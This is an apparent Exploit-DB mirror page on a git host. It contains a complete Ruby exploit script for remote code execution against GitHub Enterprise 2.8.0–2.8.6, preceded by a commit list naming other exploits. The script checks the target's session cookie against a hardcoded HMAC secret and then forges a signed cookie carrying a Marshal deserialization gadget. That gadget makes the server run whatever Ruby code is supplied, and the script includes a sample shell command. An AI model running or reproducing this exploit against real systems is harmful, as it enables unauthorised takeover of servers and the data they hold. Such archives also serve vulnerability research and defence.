bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/ruby/webapps/41616.rb
Offensive Security 66117c63f5 DB: 2017-03-16 
16 new exploits

Adobe Flash - Metadata Parsing Out-of-Bounds Read
Adobe Flash - MovieClip Attach init Object Use-After-Free
Adobe Flash - ATF Thumbnailing Heap Overflow
Adobe Flash - ATF Planar Decompression Heap Overflow
Adobe Flash - AVC Header Slicing Heap Overflow
Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow

USBPcap - Privilege Escalation
USBPcap 1.1.0.0 (WireShark 2.2.5) - Privilege Escalation
PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation
Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)

Cisco Firepower Management Console 6.0 - Post Authentication UserAdd
Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (Metasploit)
IBM WebSphere - RCE Java Deserialization (Metasploit)
Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)
Joomla! Component Vik Appointments 1.5 - SQL Injection
Joomla! Component Vik Rent Items 1.3 - SQL Injection
Joomla! Component Vik Rent Car 1.11 - SQL Injection
GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution
Steam Profile Integration 2.0.11 - SQL injection
Sitecore CMS 8.1 Update-3 - Cross-Site Scripting
2017-03-16 05:01:20 +00:00

102 lines
No EOL
2.8 KiB
Ruby
Executable file
Raw Blame History

#!/usr/bin/ruby
require "openssl"
require "cgi"
require "net/http"
require "uri"
SECRET = "641dd6454584ddabfed6342cc66281fb"
puts ' ___. .__ '
puts ' ____ ___ ________ \_ |__ | | __ __ ____ '
puts '_/ __ \\\\ \/ /\__ \ | __ \| | | | \_/ __ \ '
puts '\ ___/ > < / __ \| \_\ \ |_| | /\ ___/ '
puts ' \___ >__/\_ \(____ /___ /____/____/ \___ >'
puts ' \/ \/ \/ \/ \/ '
puts ''
puts "github Enterprise RCE exploit"
puts "Vulnerable: 2.8.0 - 2.8.6"
puts "(C) 2017 iblue <iblue@exablue.de>"
unless ARGV[0] && ARGV[1]
puts "Usage: ./exploit.rb <hostname> <valid ruby code>"
puts ""
puts "Example: ./exploit.rb ghe.example.org \"%x(id > /tmp/pwned)\""
exit 1
end
hostname = ARGV[0]
code = ARGV[1]
# First we get the cookie from the host to check if the instance is vulnerable.
puts "[+] Checking if #{hostname} is vulnerable..."
http = Net::HTTP.new(hostname, 8443)
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE # We may deal with self-signed certificates
rqst = Net::HTTP::Get.new("/")
while res = http.request(rqst)
case res
when Net::HTTPRedirection then
puts " => Following redirect to #{res["location"]}..."
rqst = Net::HTTP::Get.new(res["location"])
else
break
end
end
def not_vulnerable
puts " => Host is not vulnerable"
exit 1
end
unless res['Set-Cookie'] =~ /\A_gh_manage/
not_vulnerable
end
# Parse the cookie
begin
value = res['Set-Cookie'].split("=", 2)[1]
data = CGI.unescape(value.split("--").first)
hmac = value.split("--").last.split(";", 2).first
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, data)
not_vulnerable if expected_hmac != hmac
rescue
not_vulnerable
end
puts " => Host is vulnerable"
# Now construct the cookie
puts "[+] Assembling magic cookie..."
# Stubs, since we don't want to execute the code locally.
module Erubis;class Eruby;end;end
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
erubis = Erubis::Eruby.allocate
erubis.instance_variable_set :@src, "#{code}; 1"
proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
proxy.instance_variable_set :@instance, erubis
proxy.instance_variable_set :@method, :result
proxy.instance_variable_set :@var, "@result"
session = {"session_id" => "", "exploit" => proxy}
# Marshal session
dump = [Marshal.dump(session)].pack("m")
hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
puts "[+] Sending cookie..."
rqst = Net::HTTP::Get.new("/")
rqst['Cookie'] = "_gh_manage=#{CGI.escape("#{dump}--#{hmac}")}"
res = http.request(rqst)
if res.code == "302"
puts " => Code executed."
else
puts " => Something went wrong."
end
Reference in a new issue View git blame Copy permalink